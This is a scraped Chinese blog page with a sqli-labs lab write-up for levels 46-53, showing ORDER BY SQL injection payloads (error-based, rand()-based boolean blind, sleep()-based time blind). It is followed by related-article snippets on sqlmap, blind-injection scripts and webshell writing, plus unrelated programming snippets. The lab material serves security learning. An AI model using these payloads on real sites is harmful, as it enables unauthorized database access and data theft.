baynk
baynk

Sqlilabs Less 46-53 ORDER BY

进入到新的环节了,order by 后的注入,和之前的select有点不太一样

Less 46 ORDER BY-Error-Numeric

手工注入

  • 输入sort=1后出现的是一张排序的表格。
    Sqlilabs Less 46-53 ORDER BY_第1张图片
  • 可以尝试使用sort=1 desc或者sort=1 asc来判断是否存在注入点。desc是降序,asc是升序。如果有变化说明存在注入点。
    Sqlilabs Less 46-53 ORDER BY_第2张图片
  • 由于order by 后面只能接(字段名,位置,表达式)等信息,如果并不能向原来一样使用联合查询。这里面直接使用sort=(select ...)的方式来实现报错注入。参考less 5的手法。
  • 就是把select *改成了select count(*),因为order by 后只能接一个参数,其余的没什么变化。(select count(*) from (select concat_ws("^",(select table_name from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x,count(*) from information_schema.tables group by x)y)
    Sqlilabs Less 46-53 ORDER BY_第3张图片
  • 然后其余的数据就不写了,放在其他less里面去。

函数分析

Less 47 ORDER BY Clause-Error-Single quote

手工注入

  • 看标题说有单引号。。。但是想想有点奇怪的,Order by后面不都是接数值,第几个第几个字段么,一直没用过单引号。。。
  • 如果还用之前的sort=(select ...)似乎怎么样都没法实现闭合。这关换另外一种方法尝试。1' and (select count(*) from (select concat_ws("^",(select table_name from information_schema.tables where table_schema=database() limit 3,1),floor(rand(0)*2))x,count(*) from information_schema.tables group by x)y) --+
    Sqlilabs Less 46-53 ORDER BY_第4张图片

函数分析

Less 48 ORDER BY Clause Blind based

手工注入

  • 盲注来了,之前的两种报错注入都没法使用了。这里使用rand()函数来完成。先说原理。
  • 当sort=rand(true)和sort=(false)时会出现不同的结果。基于这点就可以使用布尔型的盲注了。
  • 直接将rand()函数中的数值换成判断语句即可。这边猜一下users表中有几个字段吧。rand((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3)
  • rand(ture)在我的实验环境中第一个是id=11,而rand(false)在我的实验环境中第一个是id=1。
  • 结果显示是id=11,也就是语句是正确的。
    Sqlilabs Less 46-53 ORDER BY_第5张图片

函数分析

Less 49 ORDER BY Clause Blind based with single quote

手工注入

  • 由于有单引号的原因,直接使用rand()就不太好用,用sort=1' and rand()尝试后也用不好,这里还可以使用一下基于时间的盲注。这个sleep()会比原来用的时间久,查了资料说是因为每有一条满足条件的记录就会执行一次,这里就不去验证了,意义不大。
  • 1' and if((ascii(substr(database(),1,1)))>0,sleep(1),1) --+
    Sqlilabs Less 46-53 ORDER BY_第6张图片

函数分析

Less 50-53 Order by with Stacked Injection

手工注入

  • 这里就不再玩一遍了,就是Order by 和前面的Stacked Injection组合起来,其实是一样的,直接过。

函数分析

你可能感兴趣的:(#,SQLilabs)

  • 渗透笔记(二) 帅云毅 笔记
    靶场实战解析:sqli-labs通关大全(更新至Less60)_sqlilabs通关-CSDN博客https://blog.csdn.net/elephantxiang/article/details/1200915071数据库类型解答MYSQL和其他数据库的主要区别是什么?答:本质上相似不同数据库的提交方法和数据类型相似吗?答:不同数据库的提交方法(事务控制)和数据类型在概念上是相似的不同数据库
  • sql注入空格被过滤_SQL注入:各种绕过检测的姿势 weixin_39874589 sql注入空格被过滤
    这一篇主要总结一下sqlilabs中advancedinjection中的用到的各种绕过,也就是less21-less38。目录1)数据编码2)特殊字符、语法关键字过滤3)存储型注入4)特殊字符转义与宽字节注入5)防火墙保护与http参数污染数据编码http://111.231.88.117/sqli_lab/sqli-labs-php7/Less-21/http://111.231.88.117
  • 时间盲注,boolen盲注 中 获取表、列、具体数据的函数 计科2 黄和平 笔记安全
    importrequestsimporttime#创建会话对象,用于保持与目标服务器的会话状态,便于多次请求session=requests.session()#目标URL,是存在SQL注入漏洞的页面地址url="http://127.0.0.1/sqlilabs/Less-8/index.php"#通过布尔盲注获取当前使用的数据库名称defgetDatabase(url):results=[]#
  • 时间盲注和boolen盲注中获取表,列以及具体数据的函数 Eoip_zacb oracle数据库
    importrequestsimporttime#创建会话对象,用于保持与目标服务器的会话状态,便于多次请求session=requests.session()#目标URL,是存在SQL注入漏洞的页面地址url="http://127.0.0.1/sqlilabs/Less-8/index.php"#通过布尔盲注获取当前使用的数据库名称defgetDatabase(url):results=[]#
  • Sqlilabs靶场1-10关详解(Get请求式) 爱吃仡坨 Sqlilabs靶场数据库mysqlsqlSQlilabs靶场通关
    sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对
  • sqli-labs靶场第一关详解 赛sir 网络安全靶场sql靶场mysql
    目录sqlilabs靶场第一关0.sql注入解释0.1什么是sql注入0.2sql注入的原理0.3sql注入方法0.3.1数字型注入0.3.2字符型注入1.注入第一步判断请求方式、类型1.1打开我自己本地的靶场http://sql.com/Less-1/(上一期靶场搭建:http://t.csdnimg.cn/mzLeq)1.2.进行手工测试判断有没有sql注入?1.3?id=11.4and1=1
  • 利用sqlmap探测get类型注入 狗蛋的博客之旅 Web安全渗透oracle数据库
    环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客基础:GET基于报错的sql注入利用-脱库-CSDN博客sqlmap工具是kali自带的例子我都用sql靶场的第一关做演示1、探测数据库名sqlmap-u"http://192.168.0.103/sqlilabs/less-1/?id=1"--dbs--batch这是一个使用sqlmap工具进行SQL注
  • get基于报错的sql注入利用-读敏感文件和写入一句话木马 狗蛋的博客之旅 Web安全渗透sql数据库
    环境准备:构建完善的安全渗透测试环境:推荐工具、资源和下载链接_渗透测试靶机下载-CSDN博客基础:GET基于报错的sql注入利用-脱库-CSDN博客1、selectintooutfile或dumpfile写入一句话马这里用Sqli-labs靶场的第一关做演示,之前演示过改关卡的闭合符是单引号,靶场地址:http://127.0.0.1/sqlilabs/less-1/?id=1判断MysQL的存
  • sqlilabs第六十五关 himobrinehacken sqli-labsweb安全sql网络攻击模型网络安全数据库
    Less-65(GET-challenge-Bilnd-130queriesallowed-Variation4)手工注入
  • SQL注入实操(get、post基于报错的注入,sqlilabs靶场) ting_liang sql数据库
    一、get基于报错的注入1、利用orderby判断字段数正确?id=1'报错?id=1'orderby3--+(编号为3正确)------可以看出为3个字段(编号为4错误)2、union联合注入?id=0(不存在这样的记录,查不到的意思)(报错)?id=0'unionselect1,2,3--+(联合查询前面查3个后面查3个)?id=0'unionselect1,database(),user()
  • sqlilabs第六十一六十二关 himobrinehacken sqli-labssql数据库安全网络安全系统安全
    Less-61(GET-challenge-DoubleQuery-5queriesallowed-Variation4)手工注入报错注入Less-62(GET-challenge-Bilnd-130queriesallowed-Variation1)手工注入过于复杂简单写写这个应该是用不了只能用延时自动注入写个脚本就可以
  • sqlilabs第五十三五十四关 himobrinehacken sqli-labssql数据库web安全网络安全网络攻击模型
    Less-53(GET-GET-Errorbased-ORDERBYCLAUSE-String-Stackedinjection)手工注入单引号闭合,和上一关一样堆叠注入解决自动注入和上一关一样Less-54(GET-challenge-Union-10queriesallowed-Variation1)手工注入这一关开始后面的可以看做是挑战10次注入解决数据库已知数据库名要知道表名单引号闭合自动
  • sqlilabs第五十九六十关 himobrinehacken sqli-labsweb安全sql网络攻击模型网络安全数据库
    Less-59(GET-challenge-DoubleQuery-5queriesallowed-Variation2)手工注入报错注入Less-60(GET-challenge-DoubleQuery-5queriesallowed-Variation3)手工注入
  • sqlilabs第五十七五十八关 himobrinehacken sqli-labs网络安全系统安全安全网络攻击模型web安全
    Less-57(GET-challenge-Union-14queriesallowed-Variation4)手工注入Less-58(GET-challenge-DoubleQuery-5queriesallowed-Variation1)手工注入报错注入就可以(布尔注入的话次数不够)(所以我们前面需要做够足够的数据支持)最后一刻抓到了
  • sqlilabs第四十七四十八关 himobrinehacken sqli-labs安全网络安全系统安全网络攻击模型web安全
    Less-47(GET-Errorbased-String-ORDERBYVLAUSE)手工注入报错注入即可调整数值就能看到所有的数据自动注入和上一关一样Less-48(GET-Errorbased-Bind-Numeric-ORDERBYVLAUSE)手工注入数字注入只能使用时间盲注了接下来就是正常的sql注入流程了自动注入和上一关一样
  • sqlilabs第四十九五十关 himobrinehacken sqli-labs网络安全安全网络攻击模型web安全系统安全
    Less-49(GET-Errorbased-StringBind-ORDERBYCLAUSE)手工注入无回显(还是单引号闭合),只能使用延时注入自动脚本和上一关一样Less-50(GET-Errorbased-ORDERBYCLAUSE-numeric-Stackedinjection)手工注入这里需要使用堆叠注入的思路自动脚本和上一关一样
  • sqlilabs第五十一五十二关 himobrinehacken sqli-labssql网络攻击模型网络安全数据库web安全
    Less-51(GET-Errorbased-ORDERBYCLAUSE-String-Stackedinjection)手工注入源码单引号闭合用注释(没有后续输出只能堆叠注入)自动注入和上一关一样Less-52(GET-Bindbased-ORDERBYCLAUSE-numeric-Stackedinjection)手工注入数字类型'不用注释直接堆叠注入自动注入和上一关一样
  • 零基础学SQL注入必练靶场之SQLiLabs(搭建+打靶) Ms08067安全实验室 sql数据库
    文章来源|MS08067Web零基础就业班1期作业本文作者:giunwr、tyrant(零基础1期)SQLi-Labs是一个专业的SQL注入漏洞练习靶场,零基础的同学学SQL注入的时候,sqli-labs这个靶场是必练的,它里面包含了很多注入场景,以及在sql注入的时候遇到的各种问题,适用于GET和POST场景,包含了以下注入:一、作业描述完成sqllibs前18关,尽可能使用多的方法二、sqll
  • sqlilabs第三十八三十九关 himobrinehacken sqli-labs安全系统安全网络攻击模型web安全网络安全
    Less-38(FutureEditions)手工注入#号失效自动注入和sqli-labs第一二关-CSDN博客一样Less-38(GET-StackedQueryInjection-String)手工注入数字型其他的和上面一样自动注入和上面一样
  • sqlilabs第三十六三十七关 himobrinehacken sqli-labssql数据库网络安全网络攻击模型web安全
    Less-36(GET-BypassMySQL_real_escape_string)手工注入单引号闭合(单引号自动转换的编码变了直接输入%27)自动注入和上一关一样Less-37(POST-BypassMySQL_real_escape_string)手工注入这个也是碰到过的情况接下来就是和前面的操作一样了自动注入和前面一样
  • sqlilabs第三十四三十五关 himobrinehacken sqli-labssql网络攻击模型数据库web安全网络安全
    Less-34(POST-BypassAddSlashes())手工注入和sqlilabs第三十二三十三关-CSDN博客一样只是变成post但是注意一下get方式是会经过url编码的,但是post是不会编码的,我们可以使用utf-8转换成utf-16或者utf-32(利用%bb)(写掉了单引号后面发现了)接下来就是和之前一样了(注意1=1也可以成功)注意查字段的时候需要使用盲注自动注入和之前一样的
  • sqlilabs第三十二三十三关 himobrinehacken sqli-labs安全web安全系统安全网络攻击模型网络安全
    Less-32(GET-Bypasscustomfilteraddingslashestodangerouschars)手工注入由宽字符注入可知payload成功触发报错http://192.168.21.149/Less-32/?id=1%df'要写字符串的话直接吧字符串变成ascii码注意16进制的表示方式自动注入sqlmap-uhttp://192.168.21.149/Less-32/?i
  • mysql sql注释符号_SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 weixin_39781452 mysqlsql注释符号
    以MySQL为例,首先我们知道mysql注释符有#、--(后面有空格)、/**/三种,在SQL注入中经常用到,但是不一定都适用。笔者在sqlilabs通关过程中就遇到不同场景用的注释符不同,这让我很疑惑,让我们来深入挖掘一番(篇幅比较长,省时间可以跳到最后看结论)。以第一关(GET提交方式)和第十一关(POST提交方式)为例,从前端--数据传输--数据库查询命令三方面讲解:目录(本文篇幅较长,点击
  • PHPsqlilabs不报错,字符自动转义 叶局长
    问题今天在安装sqlilabs后,发现传递的参数会被自动转义,怎么都不报错,原来是打开了magic_quotes_gpc选项。这个开启时,通过GET,POST,COOKIE传递的数据会自动被转义。如test.php?id=abc'de"fecho$_GET['id'];#会得到abc'de"f解决方法:将magic_quotes_gpc参数选项关闭即可
  • sqli-labs(Less-5) updatexml闯关 Star abuse sqli-labs安全网络安全
    updatexml()-Xpath类型函数1.确定注入点闭合方式确认为字符型注入2.爆出当前数据库的库名http://127.0.0.1/sqlilabs/Less-5/?id=1'andupdatexml('~',concat('~',(selectdatabase())),'~')--+3.爆出当前用户名http://127.0.0.1/sqlilabs/Less-5/?id=1'andupd
  • sqli-labs(Less-4) extractvalue闯关 Star abuse sqli-labs网络安全web安全
    extractvalue()-Xpath类型函数1.确认注入点如何闭合的方式2.爆出当前数据库的库名http://127.0.0.1/sqlilabs/Less-4/?id=1")andextractvalue(1,concat('~',(selectdatabase())))--+3.爆出当前数据库的表名http://127.0.0.1/sqlilabs/Less-4/?id=1")andext
  • sqli-labs(Less-3) Star abuse sqli-labs网络安全web安全
    1.通过构造id=1’和id=1’)和id=1’)–+确定存在注入可知原始url为id=(‘1’)2.使用orderby语句猜字段数http://127.0.0.1/sqlilabs/Less-3/?id=1')orderby4--+http://127.0.0.1/sqlilabs/Less-3/?id=1')orderby3--+3.使用联合查询unionselecthttp://127.0.
  • Sqli-Labs:Less 26 - Less 26a Hyafinthus
    Less26基于错误_GET_过滤空格/注释_单引号_字符型注入0x01.判断注入类型http://localhost:8088/sqlilabs/Less-26/?id=1'单引号闭合。0x02.判断过滤与绕过这关的过滤实在是很严格,我们先看源码:$id=blacklist($id);$hint=$id;functionblacklist($id){$id=preg_replace('/or/i
  • sqli-labs靶场安装 剁椒鱼头没剁椒 #靶场安装网络安全学习网络安全web安全安全服务器
    sqli-labs靶场安装一、环境准备二、工具及靶场介绍1.Phpstudy介绍2.sqlilabs靶场介绍三、安装步骤1.phpstudy安装2.sqlilabs靶场安装1)下载sqlilabs2)解压sqlilabs3)放入服务器中4)配置sqlilabs5)访问sqlilab6)靶场默认配置7)安装成功四、其他问题1.环回地址抓不到包2.关卡乱码/BUG3.第7关文件上传导入不进去一、环境准
  • sqlilabs靶场搭建 Lamar Carpenter 网络安全网络安全
    前言SQL注入是比较常见的一个高风险漏洞,所以学习SQL注入也是学习网络安全的一个关键。学习漏洞一定要从实践中学习,所以一个靶场就显得相当重要。本文将教会大家sqlilabs(一个SQL注入的靶场)的安装。ps:sqlilabs需要apache+MySQL环境的支持,所以需要安装apache和MySQL,当然这里推荐使用phpstudy,更加快捷的实现apache+MySQL的配置,对于学习漏洞可
  • web前段跨域nginx代理配置 刘正强 nginxcmsWeb
    nginx代理配置可参考server部分 server {         listen       80;         server_name  localhost;
  • spring学习笔记 caoyong spring
    一、概述     a>、核心技术 : IOC与AOP b>、开发为什么需要面向接口而不是实现     接口降低一个组件与整个系统的藕合程度,当该组件不满足系统需求时,可以很容易的将该组件从系统中替换掉,而不会对整个系统产生大的影响 c>、面向接口编口编程的难点在于如何对接口进行初始化,(使用工厂设计模式)
  • Eclipse打开workspace提示工作空间不可用 0624chenhong eclipse
    做项目的时候,难免会用到整个团队的代码,或者上一任同事创建的workspace, 1.电脑切换账号后,Eclipse打开时,会提示Eclipse对应的目录锁定,无法访问,根据提示,找到对应目录,G:\eclipse\configuration\org.eclipse.osgi\.manager,其中文件.fileTableLock提示被锁定。 解决办法,删掉.fileTableLock文件,重
  • Javascript 面向对面写法的必要性? 一炮送你回车库 JavaScript
    现在Javascript面向对象的方式来写页面很流行,什么纯javascript的mvc框架都出来了:ember 这是javascript层的mvc框架哦,不是j2ee的mvc框架   我想说的是,javascript本来就不是一门面向对象的语言,用它写出来的面向对象的程序,本身就有些别扭,很多人提到js的面向对象首先提的是:复用性。那么我请问你写的js里有多少是可以复用的,用fu
  • js array对象的迭代方法 换个号韩国红果果 array
    1.forEach 该方法接受一个函数作为参数, 对数组中的每个元素 使用该函数  return 语句失效 function square(num) { print(num, num * num); } var nums = [1,2,3,4,5,6,7,8,9,10]; nums.forEach(square); 2.every 该方法接受一个返回值为布尔类型
  • 对Hibernate缓存机制的理解 归来朝歌 session一级缓存对象持久化
    在hibernate中session一级缓存机制中,有这么一种情况: 问题描述:我需要new一个对象,对它的几个字段赋值,但是有一些属性并没有进行赋值,然后调用 session.save()方法,在提交事务后,会出现这样的情况: 1:在数据库中有默认属性的字段的值为空 2:既然是持久化对象,为什么在最后对象拿不到默认属性的值? 通过调试后解决方案如下: 对于问题一,如你在数据库里设置了
  • WebService调用错误合集 darkranger webservice
     Java.Lang.NoClassDefFoundError: Org/Apache/Commons/Discovery/Tools/DiscoverSingleton 调用接口出错, 一个简单的WebService import org.apache.axis.client.Call;import org.apache.axis.client.Service; 首先必不可
  • JSP和Servlet的中文乱码处理 aijuans Java Web
    JSP和Servlet的中文乱码处理 前几天学习了JSP和Servlet中有关中文乱码的一些问题,写成了博客,今天进行更新一下。应该是可以解决日常的乱码问题了。现在作以下总结希望对需要的人有所帮助。我也是刚学,所以有不足之处希望谅解。 一、表单提交时出现乱码: 在进行表单提交的时候,经常提交一些中文,自然就避免不了出现中文乱码的情况,对于表单来说有两种提交方式:get和post提交方式。所以
  • 面试经典六问 atongyeye 工作面试
    题记:因为我不善沟通,所以在面试中经常碰壁,看了网上太多面试宝典,基本上不太靠谱。只好自己总结,并试着根据最近工作情况完成个人答案。以备不时之需。 以下是人事了解应聘者情况的最典型的六个问题: 1 简单自我介绍 关于这个问题,主要为了弄清两件事,一是了解应聘者的背景,二是应聘者将这些背景信息组织成合适语言的能力。 我的回答:(针对技术面试回答,如果是人事面试,可以就掌
  • contentResolver.query()参数详解 百合不是茶 androidquery()详解
    收藏csdn的博客,介绍的比较详细,新手值得一看 1.获取联系人姓名 一个简单的例子,这个函数获取设备上所有的联系人ID和联系人NAME。 [java]  view plain copy   public void fetchAllContacts() {      
  • ora-00054:resource busy and acquire with nowait specified解决方法 bijian1013 oracle数据库killnowait
            当某个数据库用户在数据库中插入、更新、删除一个表的数据,或者增加一个表的主键时或者表的索引时,常常会出现ora-00054:resource busy and acquire with nowait specified这样的错误。主要是因为有事务正在执行(或者事务已经被锁),所有导致执行不成功。 1.下面的语句
  • web 开发乱码 征客丶 springWeb
    以下前端都是 utf-8 字符集编码 一、后台接收 1.1、 get 请求乱码 get 请求中,请求参数在请求头中; 乱码解决方法: a、通过在web 服务器中配置编码格式:tomcat 中,在 Connector 中添加URIEncoding="UTF-8"; 1.2、post 请求乱码 post 请求中,请求参数分两部份, 1.2.1、url?参数,
  • 【Spark十六】: Spark SQL第二部分数据源和注册表的几种方式 bit1129 spark
    Spark SQL数据源和表的Schema case class apply schema parquet json JSON数据源 准备源数据 {"name":"Jack", "age": 12, "addr":{"city":"beijing&
  • JVM学习之:调优总结 -Xms -Xmx -Xmn -Xss BlueSkator -Xss-Xmn-Xms-Xmx
      堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m。典型设置: java -Xmx355
  • jqGrid 各种参数 详解(转帖) BreakingBad jqGrid
      jqGrid 各种参数 详解 分类:  源代码分享  个人随笔请勿参考  解决开发问题 2012-05-09 20:29   84282人阅读   评论(22)   收藏   举报 jquery 服务器 parameters function ajax string  
  • 读《研磨设计模式》-代码笔记-代理模式-Proxy bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; import java.lang.reflect.Proxy; /* * 下面
  • 应用升级iOS8中遇到的一些问题 chenhbc ios8升级iOS8
    1、很奇怪的问题,登录界面,有一个判断,如果不存在某个值,则跳转到设置界面,ios8之前的系统都可以正常跳转,iOS8中代码已经执行到下一个界面了,但界面并没有跳转过去,而且这个值如果设置过的话,也是可以正常跳转过去的,这个问题纠结了两天多,之前的判断我是在 -(void)viewWillAppear:(BOOL)animated  中写的,最终的解决办法是把判断写在 -(void
  • 工作流与自组织的关系? comsci 设计模式工作
      目前的工作流系统中的节点及其相互之间的连接是事先根据管理的实际需要而绘制好的,这种固定的模式在实际的运用中会受到很多限制,特别是节点之间的依存关系是固定的,节点的处理不考虑到流程整体的运行情况,细节和整体间的关系是脱节的,那么我们提出一个新的观点,一个流程是否可以通过节点的自组织运动来自动生成呢?这种流程有什么实际意义呢?   这里有篇论文,摘要是:“针对网格中的服务
  • Oracle11.2新特性之INSERT提示IGNORE_ROW_ON_DUPKEY_INDEX daizj oracle
    insert提示IGNORE_ROW_ON_DUPKEY_INDEX 转自:http://space.itpub.net/18922393/viewspace-752123 在 insert into tablea ...select * from tableb中,如果存在唯一约束,会导致整个insert操作失败。使用IGNORE_ROW_ON_DUPKEY_INDEX提示,会忽略唯一
  • 二叉树:堆 dieslrae 二叉树
        这里说的堆其实是一个完全二叉树,每个节点都不小于自己的子节点,不要跟jvm的堆搞混了.由于是完全二叉树,可以用数组来构建.用数组构建树的规则很简单:     一个节点的父节点下标为: (当前下标 - 1)/2     一个节点的左节点下标为: 当前下标 * 2 + 1   &
  • C语言学习八结构体 dcj3sjt126com c
    为什么需要结构体,看代码 # include <stdio.h> struct Student //定义一个学生类型,里面有age, score, sex, 然后可以定义这个类型的变量 { int age; float score; char sex; } int main(void) { struct Student st = {80, 66.6,
  • centos安装golang dcj3sjt126com centos
    #在国内镜像下载二进制包 wget -c  http://www.golangtc.com/static/go/go1.4.1.linux-amd64.tar.gz tar -C /usr/local -xzf go1.4.1.linux-amd64.tar.gz   #把golang的bin目录加入全局环境变量 cat >>/etc/profile<
  • 10.性能优化-监控-MySQL慢查询 frank1234 性能优化MySQL慢查询
    1.记录慢查询配置 show variables where variable_name like 'slow%' ; --查看默认日志路径 查询结果:--不用的机器可能不同 slow_query_log_file=/var/lib/mysql/centos-slow.log 修改mysqld配置文件:/usr /my.cnf[一般在/etc/my.cnf,本机在/user/my.cn
  • Java父类取得子类类名 happyqing javathis父类子类类名
      在继承关系中,不管父类还是子类,这些类里面的this都代表了最终new出来的那个类的实例对象,所以在父类中你可以用this获取到子类的信息!   package com.urthinker.module.test; import org.junit.Test; abstract class BaseDao<T> { public void
  • Spring3.2新注解@ControllerAdvice jinnianshilongnian @Controller
    @ControllerAdvice,是spring3.2提供的新注解,从名字上可以看出大体意思是控制器增强。让我们先看看@ControllerAdvice的实现:   @Target(ElementType.TYPE) @Retention(RetentionPolicy.RUNTIME) @Documented @Component public @interface Co
  • Java spring mvc多数据源配置 liuxihope spring
    转自:http://www.itpub.net/thread-1906608-1-1.html 1、首先配置两个数据库 <bean id="dataSourceA" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close&quo
  • 第12章 Ajax(下) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • BW / Universe Mappings blueoxygen BO
      BW Element OLAP Universe Element Cube  Dimension Class Charateristic A class with dimension and detail objects (Detail objects for key and desription) Hi
  • Java开发熟手该当心的11个错误 tomcat_oracle java多线程工作单元测试
    #1、不在属性文件或XML文件中外化配置属性。比如,没有把批处理使用的线程数设置成可在属性文件中配置。你的批处理程序无论在DEV环境中,还是UAT(用户验收 测试)环境中,都可以顺畅无阻地运行,但是一旦部署在PROD 上,把它作为多线程程序处理更大的数据集时,就会抛出IOException,原因可能是JDBC驱动版本不同,也可能是#2中讨论的问题。如果线程数目 可以在属性文件中配置,那么使它成为
  • 推行国产操作系统的优劣 yananay windowslinux国产操作系统
    最近刮起了一股风,就是去“国外货”。从应用程序开始,到基础的系统,数据库,现在已经刮到操作系统了。原因就是“棱镜计划”,使我们终于认识到了国外货的危害,开始重视起了信息安全。操作系统是计算机的灵魂。既然是灵魂,为了信息安全,那我们就自然要使用和推行国货。可是,一味地推行,是否就一定正确呢? 先说说信息安全。其实从很早以来大家就在讨论信息安全。很多年以前,就据传某世界级的网络设备制造商生产的交
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他